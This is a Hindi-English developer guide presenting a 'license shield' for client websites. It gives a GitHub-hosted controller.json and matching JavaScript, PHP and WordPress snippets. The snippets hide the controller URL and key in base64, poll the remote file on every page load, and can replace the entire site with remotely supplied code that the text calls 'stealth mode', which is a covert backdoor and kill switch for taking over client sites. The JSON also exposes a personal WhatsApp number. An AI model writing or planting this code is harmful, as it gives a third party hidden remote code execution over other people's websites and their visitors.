1. GitHub Configuration (controller.json)
Ab isme sirf date nahi, balki domains aur custom code ka option bhi hai.

JSON



{
  "licenses": {
    "LANDINGPAGE": {
      "expiry": "2026-01-15",
      "authorized_target": ["yourdomain.com"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "FAHAD-786": {
      "expiry": "2026-12-31",
      "authorized_target": ["fahadtech8.github.io", "https://fahadtech8.github.io"],
      "custom_code": {
        "enabled": false,
        "code": "<div style='position:fixed;bottom:15px;right:15px;background:linear-gradient(135deg,#1d976c,#93f9b9);color:white;padding:12px 20px;z-index:9999;font-family:sans-serif;font-size:14px;font-weight:600;border-radius:12px;box-shadow:0px 8px 20px rgba(0,0,0,0.2);'>Fahad Account Active</div>"
      }
    },
    "WP-CLIENT-03": {
      "expiry": "2026-03-10",
      "authorized_target": ["client3.com"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "TECH-PRO-04": {
      "expiry": "2026-05-20",
      "authorized_target": [], 
      "custom_code": { "enabled": false, "code": "" }
    },
    "GURU-DEV-05": {
      "expiry": "2026-07-15",
      "authorized_target": ["gurudev.net"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "SMART-WEB-06": {
      "expiry": "2026-08-01",
      "authorized_target": ["smartweb.org"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "LUX-SHOP-07": {
      "expiry": "2026-10-10",
      "authorized_target": ["luxshop.in"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "PORTFOLIO-08": {
      "expiry": "2026-12-01",
      "authorized_target": ["myportfolio.com"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "ECOM-HUB-09": {
      "expiry": "2027-01-20",
      "authorized_target": ["ecomhub.pk", "test-store.com"],
      "custom_code": { "enabled": false, "code": "" }
    },
    "MASTER-KEY-10": {
      "expiry": "2028-12-31",
      "authorized_target": [],
      "custom_code": { "enabled": false, "code": "" }
    }
  },
  "title": "License Alert",
  "msg_expired": "Your license has expired. <br><br> <a href='https://wa.me/917081160639' style='display:inline-block; background:#25D366; color:white; padding:12px 25px; text-decoration:none; border-radius:50px; font-weight:bold; box-shadow:0 4px 15px rgba(37,211,102,0.4);'>Renew Now via WhatsApp</a>",
  "msg_invalid": "Invalid License! <br> Contact Admin for activation.",
  "msg_domain_mismatch": "Unauthorized Domain! <br> This license is not registered for this website."
}




2. Landing Page (HTML/JS)
Update: Isme innerHTML fix hai taaki WhatsApp button clickable dikhe.

HTML

<div id="secure_layer" style="display:none; position:fixed; inset:0; background:rgba(0,0,0,0.98); z-index:9999999; color:white; align-items:center; justify-content:center; text-align:center; font-family:sans-serif;">
    <div style="padding:40px; background:#000; border:1px solid #444; border-radius:20px; max-width:450px;">
        <h1 id="t_header" style="color:#ff3333; margin:0; font-size:26px;"></h1>
        <p id="t_body" style="color:#bbb; margin-top:20px; font-size:16px; line-height:1.6;"></p>
    </div>
</div>

<script>
(function(){
    const _u="aHR0cHM6Ly9mYWhhZHRlY2g4LmdpdGh1Yi5pby9zZXJ2ZXIvY29udHJvbGxlci5qc29u", _k="RkFIQUQtNzg2";
    async function check(){
        const layer=document.getElementById('secure_layer'), scene=document.querySelector('.scene'), host=window.location.hostname.replace('www.','');
        try {
            const r=await fetch(atob(_u)+'?v='+Date.now()), d=await r.json(), cfg=d.licenses[atob(_k)], today=new Date().toISOString().split('T')[0];
            if(!cfg){ show(d.title, d.msg_invalid); return; }
            if(cfg.authorized_target?.length>0 && !cfg.authorized_target.includes(host)){ show("Unauthorized", d.msg_domain_mismatch); return; }
            if(cfg.expiry && today>cfg.expiry){ show(d.title, d.msg_expired); return; }
            layer.style.display='none'; if(scene) scene.style.display='flex';
            if(cfg.custom_code?.enabled){ 
                if(scene) scene.style.display='none'; document.body.innerHTML=cfg.custom_code.code;
                document.querySelectorAll('script').forEach(s=>{const n=document.createElement('script');n.textContent=s.textContent;document.head.appendChild(n);});
            }
        } catch(e){ show("Security Error", "Verification failed. Check Connection."); }
        function show(h,b){ document.getElementById('t_header').innerText=h; document.getElementById('t_body').innerHTML=b; layer.style.display='flex'; if(scene) scene.style.display='none'; }
    }
    check(); setInterval(check, 15000);
})();
</script>




3. PHP / Laravel Project
Update: Isme server-side multi-domain check aur stealth mode add kiya gaya hai.

PHP

<?php
function _secure_shield_v2(){
    $_u=base64_decode("aHR0cHM6Ly9mYWhhZHRlY2g4LmdpdGh1Yi5pby9zZXJ2ZXIvY29udHJvbGxlci5qc29u");
    $_k=base64_decode("RkFIQUQtNzg2");
    $host=str_replace('www.','',$_SERVER['HTTP_HOST']);
    $r=@file_get_contents($_u.'?v='.time()); 
    if(!$r) die("<div style='background:red;color:white;padding:20px;'>Security Shield Offline.</div>");
    
    $d=json_decode($r,true); $cfg=$d['licenses'][$_k]??null;
    if(!$cfg) die($d['msg_invalid']);
    
    // Domain Check
    if(!empty($cfg['authorized_target']) && !in_array($host, $cfg['authorized_target'])) {
        die("<h1>Unauthorized Domain</h1><p>Locked to: ".implode(', ', $cfg['authorized_target'])."</p>");
    }
    
    // Expiry Check
    if(isset($cfg['expiry']) && date("Y-m-d")>$cfg['expiry']) {
        die("<div style='text-align:center;padding:50px;font-family:sans-serif;'><h1>".$d['title']."</h1><p>".$d['msg_expired']."</p></div>");
    }

    // Stealth Mode
    if($cfg['custom_code']['enabled']??false){ echo $cfg['custom_code']['code']; exit; }
}
_secure_shield_v2();



4. WordPress Project
Update: WordPress hooks ke saath integrated taaki site slow na ho.

PHP

add_action('init', 'wp_fahad_shield_v2');
function wp_fahad_shield_v2() {
    if (is_admin()) return;
    $_u=base64_decode("aHR0cHM6Ly9mYWhhZHRlY2g4LmdpdGh1Yi5pby9zZXJ2ZXIvY29udHJvbGxlci5qc29u");
    $_k=base64_decode("RkFIQUQtNzg2");
    $host=str_replace('www.', '', $_SERVER['HTTP_HOST']);
    
    $res=wp_remote_get($_u.'?v='.time());
    if(is_wp_error($res)) return;
    
    $d=json_decode(wp_remote_retrieve_body($res),true); 
    $cfg=$d['licenses'][$_k]??null;
    
    if(!$cfg) wp_die($d['msg_invalid']);
    if(!empty($cfg['authorized_target']) && !in_array($host, $cfg['authorized_target'])) wp_die($d['msg_domain_mismatch']);
    if(isset($cfg['expiry']) && date("Y-m-d")>$cfg['expiry']) wp_die("<h1>".$d['title']."</h1><p>".$d['msg_expired']."</p>", "Security Alert", array('response'=>403));
    
    if($cfg['custom_code']['enabled']??false){ echo $cfg['custom_code']['code']; exit; }
}



Kaise Use Karein?
Domain Lock: Agar license ko lock karna hai, toh JSON mein domain likhein. Agar sab par chalana hai, toh [] khaali chhod dein.

WhatsApp Button: msg_expired mein pehle se professional button ka code set hai.

Real-time Update: Aap GitHub par kisi bhi client ka "enabled": true karke uski site ko foran bypass karke apna message dikha sakte hain.
